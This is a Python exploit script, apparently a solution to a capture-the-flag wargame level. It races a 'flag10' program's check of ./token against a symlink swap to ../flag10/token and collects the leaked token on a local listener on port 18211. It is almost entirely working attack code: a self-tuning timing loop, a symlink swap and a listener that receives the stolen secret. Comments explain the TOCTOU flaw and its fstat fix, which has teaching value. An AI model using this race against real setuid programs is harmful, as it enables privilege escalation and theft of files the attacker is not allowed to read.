#!/usr/bin/env python
import os
import socket
import subprocess
import sys
import time
from multiprocessing import Process, Queue
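def create_local_token():
    """Replace ./token with a fresh, empty regular file owned by this user.

    Whatever currently sits at ./token (typically the symlink left behind by
    link_target_token) is removed first; a missing entry is not an error.
    Uses direct filesystem calls instead of shelling out to ``rm``/``touch``,
    so nothing is interpreted by a shell and no extra processes are spawned.
    """
    # lexists() also sees dangling symlinks, which exists() would miss.
    if os.path.lexists("token"):
        os.remove("token")
    # Equivalent of ``touch`` on a path that no longer exists.
    with open("token", "w"):
        pass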
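def link_target_token():
    """Replace ./token with a symlink pointing at ../flag10/token.

    Any existing entry at ./token (the regular file from create_local_token)
    is removed first so the symlink can be created. The link target is the
    relative path used by the original script; it is not resolved here, so a
    dangling link is created if the target does not exist.
    """
    if os.path.lexists("token"):
        os.remove("token")
    os.symlink("../flag10/token", "token")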
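def call_flag10(queue, argv=None):
    """Run one command to completion and hand its captured stdout to *queue*.

    Args:
        queue: any object with a ``put`` method (a multiprocessing.Queue in
            the main loop). Receives the raw stdout bytes (``str`` on Py2).
        argv: command line as a list, run without a shell. Defaults to the
            original invocation ``../flag10/flag10 ./token 127.0.0.1``.

    stderr is not captured and goes wherever the caller's stderr goes.
    """
    if argv is None:
        argv = ["../flag10/flag10", "./token", "127.0.0.1"]
    proc = subprocess.Popen(argv, stdout=subprocess.PIPE)
    out, _ = proc.communicate()
    queue.put(out)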
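def listener(queue):
    """Accept connections on 127.0.0.1:18211 until one delivers a token.

    Each accepted client is held open for a second before reading (the
    original author's note: this widens the window between the target's
    access check and its read). The first payload longer than 10 bytes is
    put on *queue* and the listener shuts down; shorter payloads are
    discarded and the loop keeps accepting.

    Args:
        queue: object with a ``put`` method; receives the raw bytes read.

    Compared to the original, the listening socket sets SO_REUSEADDR so an
    immediate re-run does not fail with EADDRINUSE while the previous
    socket sits in TIME_WAIT, and both sockets are always closed, even if
    accept/recv raises.
    """
    serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        serversocket.bind(("127.0.0.1", 18211))
        serversocket.listen(5)
        while True:
            clientsocket, _ = serversocket.accept()
            try:
                # wait a second to make the time window between access and
                # read bigger in the target (original author's rationale)
                time.sleep(1)
                token = clientsocket.recv(64)
            finally:
                clientsocket.close()
            if len(token) > 10:
                queue.put(token)
                serversocket.shutdown(socket.SHUT_RDWR)
                return
    finally:
        serversocket.close()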
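# Main loop: a check-then-use (TOCTOU) race against the target's handling of
# ./token. Per the original comments, the target checks permission on the
# token path first and reads it later; the script creates a readable local
# file, starts the target, busy-waits so the permission check lands on the
# local file, then swaps in a symlink to ../flag10/token before the read.
# (A program avoids this class of bug by opening the file once and checking
# the open descriptor, e.g. fstat, instead of checking the path and then
# re-opening it.)
#
# ``c`` is measured in busy-loop iterations, so it is machine- and
# load-dependent; it is re-tuned after every failed attempt using the
# target's output as the signal.
c = 200000  # start value for the wait loop
step = 100  # start value for inc/dec of the wait loop value
last = "P"  # last action: P = Permission denied -> too fast -> inc loop value
#             C = Connected -> local token was sent -> too slow -> dec loop value
flag10_queue = Queue()
listener_queue = Queue()
# Start listener on port 18211
socket_process = Process(target=listener, args=(listener_queue,))
socket_process.start()
while True:  # main loop
    create_local_token()
    # call flag10 in subprocess
    flag10_process = Process(target=call_flag10, args=(flag10_queue,))
    flag10_process.start()
    # wait loop: let the target reach its permission check before the swap
    for _ in range(1, c):
        pass
    # exchange local token with link to target token
    link_target_token()
    # Read the result *before* joining: a child that has put() an item on a
    # multiprocessing.Queue may not exit until that item has been consumed,
    # so join-then-get can deadlock.
    result = flag10_queue.get()
    flag10_process.join()
    if not listener_queue.empty():
        token = listener_queue.get()
        socket_process.join()
        print(token)
        break
    # tune wait loop. ``result`` is bytes, so compare against a bytes prefix:
    # ``str(result)`` yields "b'Connecting...'" on Python 3 and never matches.
    if result.startswith(b"Connecting"):
        # sent local token; waited too long
        c -= step
        if last == "P" and step > 1:
            last = "C"
            step -= 1
    else:
        # flag10 accessed target token, not local token; waited not long enough
        c += step
        if last == "C" and step > 1:
            last = "P"
            step -= 1
    # progress marker without a newline on both Python 2 and 3
    # (the original ``print("."),`` only suppresses the newline on Python 2)
    sys.stdout.write(".")
    sys.stdout.flush()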